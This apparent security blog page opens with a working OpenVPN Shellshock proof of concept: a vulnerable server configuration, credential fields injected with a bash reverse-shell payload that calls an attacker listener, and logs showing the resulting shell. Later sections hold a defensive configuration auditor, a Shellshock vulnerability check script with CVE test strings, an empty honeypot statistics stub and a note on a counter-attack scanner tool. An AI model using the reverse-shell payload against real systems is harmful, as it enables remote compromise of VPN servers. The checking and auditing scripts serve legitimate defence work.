OpenVPN ShellShock

# OpenVPN ShellShock PoC
# Based on Fredrik Strömberg’s HN post: https://news.ycombinator.com/item?id=8385332
# Verified by @fj33r, posted at: http://sprunge.us/BGjP
### server.conf
port 1194
proto udp
dev tun
client-cert-not-required
auth-user-pass-verify /etc/openvpn/user.sh via-env
tmp-dir "/etc/openvpn/tmp"
ca ca.crt
cert testing.crt
key testing.key  # This file should be kept secret
dh dh1024.pem
server 10.8.0.0 255.255.255.0
keepalive 10 120
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
client-cert-not-required
plugin /usr/lib/openvpn/openvpn-auth-pam.so login
script-security 3
status openvpn-status.log
verb 3
### user.sh
#!/bin/bash
echo $username
echo $password
### start server
openvpn server.con
### terminal 1
nc -lp 4444
### terminal 2
sudo openvpn --client --remote 10.10.0.52 --auth-user-pass --dev tun --ca ca.cert --auth-nocache --comp-lzo
### username && password were both shellshocked just in case
user:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &
pass:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &
### log
Mon Sep 29 20:56:56 2014 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Mon Sep 29 20:56:56 2014 PLUGIN_INIT: POST /usr/lib/openvpn/openvpn-auth-pam.so '[/usr/lib/openvpn/openvpn-auth-pam.so] [login]'intercepted=PLUGIN_AUTH_USER_PASS_VERIFY
Mon Sep 29 20:56:56 2014 Diffie-Hellman initialized with 1024 bit key
Mon Sep 29 20:56:56 2014 WARNING: POTENTIALLY DANGEROUS OPTION --client-cert-not-required may accept clients which do not present a certificate
Mon Sep 29 20:56:56 2014 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
Mon Sep 29 20:56:56 2014 Socket Buffers: R=[163840>131072] S=[163840>131072]
Mon Sep 29 20:56:56 2014 ROUTE default_gateway=10.10.0.1
Mon Sep 29 20:56:56 2014 TUN/TAP device tun0 opened
Mon Sep 29 20:56:56 2014 TUN/TAP TX queue length set to 100
Mon Sep 29 20:56:56 2014 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
Mon Sep 29 20:56:56 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500
Mon Sep 29 20:56:56 2014 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2
Mon Sep 29 20:56:56 2014 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
Mon Sep 29 20:56:56 2014 GID set to nogroup
Mon Sep 29 20:56:56 2014 UID set to nobody
Mon Sep 29 20:56:56 2014 UDPv4 link local (bound)[undef]
Mon Sep 29 20:56:56 2014 UDPv4 link remote: [undef]
Mon Sep 29 20:56:56 2014 MULTI: multi_init called, r=256 v=256
Mon Sep 29 20:56:56 2014 IFCONFIG POOL: base=10.8.0.4 size=62ipv6=0
Mon Sep 29 20:56:56 2014 Initialization Sequence Completed
Mon Sep 29 20:57:54 2014 MULTI: multi_create_instance called
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Re-using SSL/TLS context
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 LZO compression initialized
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Control Channel MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Local Options hash (VER=V4)'530fdded'
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Expected Remote Options hash (VER=V4)'41690919'
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 TLS: Initial packet from [AF_INET]10.10.0.56:1194sid=644ea55a 5f832b02
AUTH-PAM: BACKGROUND: user '() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &' failed to authenticate: Error in service module
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: plugin function PLUGIN_AUTH_USER_PASS_VERIFY failed with status 1:/usr/lib/openvpn/openvpn-auth-pam.so
_________/bin/bash_-i____/dev/tcp/10.10.0.56/4444_0__1__
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 TLS Auth Error: Auth Username/Password verification failed for peer
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 [] Peer Connection Initiated with [AF_INET]10.10.0.56:1194
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 PUSH: Received control message: 'PUSH_REQUEST'
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 Delayed exit in 5 seconds
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 SENT CONTROL [UNDEF]'AUTH_FAILED' (status=1)
Mon Sep 29 20:58:01 2014 read UDPv4 [ECONNREFUSED]: Connection refused (code=111)
Mon Sep 29 20:58:04 2014 10.10.0.56:1194 SIGTERM[soft,delayed-exit] received, client-instance exiting
### nc listener
nobody@debian:/etc/openvpn$ id
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
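
A defender-side check for the setup above, as an added example that is not part of the original paste: it flags the three conditions the PoC depends on (a hook fed by client-supplied values, credentials passed via-env, and a bash interpreter). The hook selection, the function names and the sample files are this example's assumptions.

```shell
#!/bin/bash
# Added example, not part of the original paste.
# Hooks whose environment carries client-supplied values (this example's selection).
HOOKS='auth-user-pass-verify tls-verify client-connect client-disconnect learn-address'

# Print one finding per line for the config file $1; return 1 if anything was found.
audit_openvpn_conf() {
    local conf="$1" found=0 directive arg1 arg2 rest shebang
    while read -r directive arg1 arg2 rest || [ -n "$directive" ]; do
        case $directive in ''|'#'*|';'*) continue ;; esac
        # Level 3 is what lets OpenVPN export the password to a script's environment.
        if [ "$directive" = script-security ] && [ "${arg1:-1}" -ge 3 ] 2>/dev/null; then
            echo "script-security $arg1: passwords may be exported to script environments"
            found=1
        fi
        case " $HOOKS " in *" $directive "*) ;; *) continue ;; esac
        arg1=${arg1#\"}; arg1=${arg1%\"}    # drop simple surrounding quotes
        if [ "$directive" = auth-user-pass-verify ] && [ "$arg2" = via-env ]; then
            echo "$directive via-env: credentials reach $arg1 as environment variables"
            found=1
        fi
        if [ ! -r "$arg1" ]; then
            echo "$directive: cannot read $arg1 to check its interpreter"
            found=1
            continue
        fi
        # The interpreter decides exposure: an unpatched bash parses "() {" values at startup.
        IFS= read -r shebang < "$arg1" || true
        case $shebang in
            '#!'*bash*)
                echo "$directive: $arg1 runs under bash ($shebang)"; found=1 ;;
            '#!/bin/sh'*)
                # On some distributions /bin/sh is bash.
                case $(readlink -f /bin/sh 2>/dev/null) in
                    *bash) echo "$directive: $arg1 uses /bin/sh, which is bash here"; found=1 ;;
                esac ;;
        esac
    done < "$conf"
    return $found
}

# Constructed sample: the relevant lines of the server.conf above next to a
# corrected variant (via-file, script-security 2, non-bash verifier).
make_sample() {
    local d
    d=$(mktemp -d) || return 1
    printf '#!/bin/bash\necho $username\n' > "$d/user.sh"
    printf '#!/usr/bin/env python3\nraise SystemExit(1)\n' > "$d/verify.py"
    printf 'port 1194\nauth-user-pass-verify %s via-env\nscript-security 3\n' \
        "$d/user.sh" > "$d/weak.conf"
    printf 'port 1194\nauth-user-pass-verify %s via-file\nscript-security 2\n' \
        "$d/verify.py" > "$d/hardened.conf"
    echo "$d"
}

if d=$(make_sample); then
    echo "== weak.conf ==";     audit_openvpn_conf "$d/weak.conf" || true
    echo "== hardened.conf =="; audit_openvpn_conf "$d/hardened.conf" && echo "no findings" || true
    rm -rf "$d"
fi
```

A clean result only covers the hook script's own interpreter; anything that script launches through a vulnerable bash still needs the patched shell.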

Shellshock Check

#!/bin/bash
# Usage: ./bashcheck [path-or-name-of-bash]   (defaults to the bash found in PATH)

# Report a finding; "scary" is set below when the function-import parser is reachable.
warn() {
    if [ "$scary" == "1" ]; then
        echo -e "\033[91mVulnerable to $1\033[39m"
    else
        echo -e "\033[93mFound non-exploitable $1\033[39m"
    fi
}
good() {
    echo -e "\033[92mNot vulnerable to $1\033[39m"
}
[ -n "$1" ] && bash=$(which $1) || bash=$(which bash)
echo -e "\033[95mTesting $bash ..."
echo $($bash --version | head -n 1)
echo -e "\033[39m"
# Is the function-import parser reachable from a plain variable, or only via a prefixed name?
#r=`a="() { echo x;}" $bash -c a 2>/dev/null`
if [ -n "$(env 'a'="() { echo x;}" $bash -c a 2>/dev/null)" ]; then
    echo -e "\033[91mVariable function parser active, maybe vulnerable to unknown parser bugs\033[39m"
    scary=1
elif [ -n "$(env 'BASH_FUNC_a%%'="() { echo x;}" $bash -c a 2>/dev/null)" ]; then
    echo -e "\033[92mVariable function parser pre/suffixed [%%, upstream], bugs not exploitable\033[39m"
    scary=0
elif [ -n "$(env 'BASH_FUNC_a()'="() { echo x;}" $bash -c a 2>/dev/null)" ]; then
    echo -e "\033[92mVariable function parser pre/suffixed [(), redhat], bugs not exploitable\033[39m"
    scary=0
elif [ -n "$(env 'BASH_FUNC_<a>%%'="() { echo x;}" $bash -c a 2>/dev/null)" ]; then
    echo -e "\033[92mVariable function parser pre/suffixed [<..>%%, apple], bugs not exploitable\033[39m"
    scary=0
else
    echo -e "\033[92mVariable function parser inactive, bugs not exploitable\033[39m"
    scary=0
fi
# CVE-2014-6271: trailing commands after the function body are executed on import.
r=`env x="() { :; }; echo x" $bash -c "" 2>/dev/null`
if [ -n "$r" ]; then
    warn "CVE-2014-6271 (original shellshock)"
else
    good "CVE-2014-6271 (original shellshock)"
fi
# CVE-2014-7169: a vulnerable parser creates a file named "echo" in the current directory.
cd /tmp;rm echo 2>/dev/null
env x='() { function a a>\' $bash -c echo 2>/dev/null > /dev/null
if [ -e echo ]; then
    warn "CVE-2014-7169 (taviso bug)"
else
    good "CVE-2014-7169 (taviso bug)"
fi
# CVE-2014-7186: many here-documents overflow redir_stack (segfault = exit status 139).
$($bash -c "true $(printf '<<EOF %.0s' {1..80})" 2>/tmp/bashcheck.tmp)
ret=$?
grep -q AddressSanitizer /tmp/bashcheck.tmp
if [ $? == 0 ] || [ $ret == 139 ]; then
    warn "CVE-2014-7186 (redir_stack bug)"
else
    good "CVE-2014-7186 (redir_stack bug)"
fi
# CVE-2014-7187: 200 nested for loops.
$bash -c "`for i in {1..200}; do echo -n "for x$i in; do :;"; done; for i in {1..200}; do echo -n "done;";done`" 2>/dev/null
if [ $? != 0 ]; then
    warn "CVE-2014-7187 (nested loops off by one)"
else
    echo -e "\033[96mTest for CVE-2014-7187 not reliable without address sanitizer\033[39m"
fi
# CVE-2014-6277: parser crash on a malformed function definition.
$($bash -c "f(){ x(){ _;};x(){ _;}<<a;}" 2>/dev/null)
if [ $? != 0 ]; then
    warn "CVE-2014-6277 (lcamtuf bug #1)"
else
    good "CVE-2014-6277 (lcamtuf bug #1)"
fi
# CVE-2014-6278: tested with the plain name and with each vendor's prefixed name.
if [ -n "$(env x='() { _;}>_[$($())] { echo x;}' $bash -c : 2>/dev/null)" ]; then
    warn "CVE-2014-6278 (lcamtuf bug #2)"
elif [ -n "$(env BASH_FUNC_x%%='() { _;}>_[$($())] { echo x;}' $bash -c : 2>/dev/null)" ]; then
    warn "CVE-2014-6278 (lcamtuf bug #2)"
elif [ -n "$(env 'BASH_FUNC_x()'='() { _;}>_[$($())] { echo x;}' $bash -c : 2>/dev/null)" ]; then
    warn "CVE-2014-6278 (lcamtuf bug #2)"
else
    good "CVE-2014-6278 (lcamtuf bug #2)"
fi

Honeypot Statistics

I put together a summary of all attacking IP addresses (from 100 attacks upward) that tried to break into my SSH honeypot.

Date,   Time,   IP,     Number of attacks


Attack the Attacker

http://n0where.net/portspoof/#fuzzing

This seems to be a rather interesting anti-portscan program.

It offers the option of returning exploits as the response (as payload).

Features

  • User-land software that does not require root privileges!
  • Binds to just one TCP port per running instance
  • Easily customizable through iptables rules
  • Marginal CPU/memory usage (multi-threaded)
  • More than 8000 dynamic service signatures are supported!
  • Will help you to automate your Active Defense attacks against your attackers' tools and scripts


This tool is still a work in progress. Depending on my available time more features and enhancements are expected to be implemented.